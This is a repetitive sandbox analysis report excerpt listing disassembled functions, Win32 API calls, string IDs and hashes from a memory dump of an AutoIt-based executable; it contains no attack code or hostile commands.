                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: a95134f83c8690a851e0ae6e721a2ddfd05e32d8b7d574d92bcef7580e0c6d17
                                                                                                                                                                                                                                                                              • Instruction ID: 485d077d0054cf4bdb7a5d8f9f7c1a6e4522e2af61c28a116cfe448fcf0ea608
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a95134f83c8690a851e0ae6e721a2ddfd05e32d8b7d574d92bcef7580e0c6d17
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9301DBB6640108BBCB04E790C966EFF77A9DF46342F5000597D02A32C2EF989E1DC6B5
                                                                                                                                                                                                                                                                              Function 007525A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00752615
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: 19ab341b3ff366d9b38a285ee342f68c092f94af491406cbae158a6330fa5aa5
                                                                                                                                                                                                                                                                              • Instruction ID: 4839b5a22eb5a92dd173c9cedeb944b7f5565bf0e549ea9d798070b1b64af98b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19ab341b3ff366d9b38a285ee342f68c092f94af491406cbae158a6330fa5aa5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F01FEB6A4010877CB15E750C915EFF77B9DF06341F5010197D02B3182DBA98E0DD6B6
                                                                                                                                                                                                                                                                              Function 007526B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00752720
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: d083a7a5bfc7961e4566bcc07c80c5f175d87606635abbf44fea7fdb17907aa1
                                                                                                                                                                                                                                                                              • Instruction ID: 0a0cab18f67be37280603b4c04f53db3528dcaf058ab6565b7f82183c3ce5a8b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d083a7a5bfc7961e4566bcc07c80c5f175d87606635abbf44fea7fdb17907aa1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECF0F4B5A40218B6CB04F3A4CC55FFF73B8EF06351F501919BA22A32C2DBA9580D82A4
                                                                                                                                                                                                                                                                              Function 00723A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: 2<r$j3y
                                                                                                                                                                                                                                                                              • API String ID: 0-3851994443
                                                                                                                                                                                                                                                                              • Opcode ID: 629124902f0b1b87e0bbeec91deaf6eb59b32d44d89d986eb98181d0830742aa
                                                                                                                                                                                                                                                                              • Instruction ID: 5e13e1619acc78059f481646f803229047b68cb3be74850ad6b0d73e3fbbc5c4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 629124902f0b1b87e0bbeec91deaf6eb59b32d44d89d986eb98181d0830742aa
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F09025104159AADB149B95D840AB973B9DB04711F10817ABC89C7690FA7C8F90D369
                                                                                                                                                                                                                                                                              Function 00788432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00788471
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0078847F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 1378638983-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 170209c523f07cd6a5f537f246e8025ae9c954c14c43febdfe5bdf67365e0829
                                                                                                                                                                                                                                                                              • Instruction ID: b19023f262fe06d376211dc695e99bc6e0d8b90b3e03a2a49c8efdd558a6cd8f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 170209c523f07cd6a5f537f246e8025ae9c954c14c43febdfe5bdf67365e0829
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1F0A9322402459FC714EF68DC00D2A77A5EB8A320B60862DFA2AC73F1DB38A801DB10
                                                                                                                                                                                                                                                                              Function 00751461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0075146F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                              • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                              • Opcode ID: e330517b2ae27dfec948b7e24295cfefd064008054c239b1ac0df0fdb962e125
                                                                                                                                                                                                                                                                              • Instruction ID: c9aaf9f1f186af17c54efd215b1e4de82c3479a85e72b8cfcd8cb0129009b7e5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e330517b2ae27dfec948b7e24295cfefd064008054c239b1ac0df0fdb962e125
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0923228471C7AD3243798AC0BFC977858B04B61F11442AF748554C24EEE28D053D9
                                                                                                                                                                                                                                                                              Function 007110B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007110E2,?,?,?,006F100A), ref: 0070FAD9
                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,006F100A), ref: 007110E6
                                                                                                                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006F100A), ref: 007110F5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007110F0
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                              • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                              • Opcode ID: a3b07e906561c25c61298b07d929743bedf42870c359905e9ed6ac1fe41fc0dd
                                                                                                                                                                                                                                                                              • Instruction ID: f15360ad6e7d34ae1a404f7a0ff13492899f060ef8e55490bc2c660c9771d33f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3b07e906561c25c61298b07d929743bedf42870c359905e9ed6ac1fe41fc0dd
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8E06D706007518FD730AF28E808782BBF4BB04310F108D2DE986C6691DBBCE884CB91
                                                                                                                                                                                                                                                                              Function 0070F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0070F151
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: `5|$h5|
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-3965277467
                                                                                                                                                                                                                                                                              • Opcode ID: 051db737785e1ebbfb6cc24ca4321f595342b08feda8a3fc48b8dfa601851139
                                                                                                                                                                                                                                                                              • Instruction ID: 582e5e6848cc6138e641508a62b4127187bc6a3a03e80a58753068cfbdfb1155
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 051db737785e1ebbfb6cc24ca4321f595342b08feda8a3fc48b8dfa601851139
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE04F75504918DBC620D73CF849ED833B5AB09720B10837DE112877D19B3C2AA2DA58
                                                                                                                                                                                                                                                                              Function 007639D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007639F0
                                                                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00763A05
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                              • String ID: aut
                                                                                                                                                                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                              • Opcode ID: e33f88ca186faaaac28e8107b752eee7ef1698db9f7bb359a2e5b30cda17ec5b
                                                                                                                                                                                                                                                                              • Instruction ID: edf970333529b5a401546791cc601025c4d3a5180e6efc2e9e72eba5a18210f7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e33f88ca186faaaac28e8107b752eee7ef1698db9f7bb359a2e5b30cda17ec5b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5D05EB254032867DA70A7689C0EFCB7B6CEB44720F0002A1BA55920D1DAB8DA85CBD4
                                                                                                                                                                                                                                                                              Function 00782DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782E08
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000), ref: 00782E0F
                                                                                                                                                                                                                                                                                • Part of subcall function 0075F292: Sleep.KERNEL32 ref: 0075F30A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                              • Opcode ID: cc4d359339b3c3e933528ba57b399180a5314f02fd2c13ee15aa184312481ef5
                                                                                                                                                                                                                                                                              • Instruction ID: 091ae86c7eae62229753e4f4c459d023915a0fe24dc17a91783a43db8c1ab9ba
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc4d359339b3c3e933528ba57b399180a5314f02fd2c13ee15aa184312481ef5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02D0A9313C1300BAE238A330AC0FFC62B10AB44B10F608821B205AA0C0C8E86800CB48
                                                                                                                                                                                                                                                                              Function 00782DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782DC8
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00782DDB
                                                                                                                                                                                                                                                                                • Part of subcall function 0075F292: Sleep.KERNEL32 ref: 0075F30A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                              • Opcode ID: 2ab776bcd4bd9a1f1052fa950c5ed21c8ec46c41fb0cde789425c2a070b8b0d8
                                                                                                                                                                                                                                                                              • Instruction ID: 00f8f0fc892d6b93e6568db9913478bbf191309c681b748d662b5f782381ee65
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab776bcd4bd9a1f1052fa950c5ed21c8ec46c41fb0cde789425c2a070b8b0d8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D0A9353D4300B6E238A330AC0FFD62B10AF40B10F208821B209AA0C0C8E86800CB48
                                                                                                                                                                                                                                                                              Function 0072C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0072C213
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0072C221
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0072C27C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                              • Opcode ID: c84aadfda4e2f83d53f8b4b17635369a4245bd4f448fa317b66ef702aea43a54
                                                                                                                                                                                                                                                                              • Instruction ID: 5060d8b4fb38151225e3aa95eec2fbeab60fcc7d0d891fd919cd848b38a06a6b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c84aadfda4e2f83d53f8b4b17635369a4245bd4f448fa317b66ef702aea43a54
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19410731600225EFDB229FE8E844AAE7BE5FF22710F244169F855971A5DF388D01C760